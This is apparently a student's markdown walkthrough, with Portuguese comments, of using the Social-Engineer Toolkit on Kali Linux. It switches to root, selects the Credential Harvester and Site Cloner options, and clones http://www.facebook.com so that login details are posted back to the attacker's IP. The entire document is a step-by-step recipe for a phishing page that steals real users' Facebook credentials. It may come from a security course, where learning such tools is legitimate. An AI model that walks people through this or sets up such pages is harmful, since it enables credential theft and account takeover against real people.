    ##alterando usuario para controle root
(will@kali)-[~]
    $ sudo su

(root@kali)-[home/will]
    $setoolkit

Select from the menu:

set> 1 "Social-Engeneering Attacks

Select from the menu:
![menu](c:\Users\denis\Downloads\Imagem1.jpg)
set> 2 "Website Attack Vectors"

![menu](c:\Users\denis\Downloads\Imagem2.jpg)
set:webattack> 3 "Credential Harvester Attakc Method"


![menu](c:\Users\denis\Downloads\Imagem3.jpg)
set:webattack> 2 "Site Cloner"

    ##se voce nao sabe seu IP voce pode dar o comando "ifconfig"
    ##caso seu IP ja esteja aparecendo na tela voce pode dar apenas enter
set:webattack> IP address for the POST back in Harvester/tabnabbig [000.000.1.28]:


set:webattack> Enter the url to clone: http://www.facebook.com
![menu](c:\Users\denis\Downloads\Imagem4.jpg)
![menu](c:\Users\denis\Downloads\Imagem5.jpg)
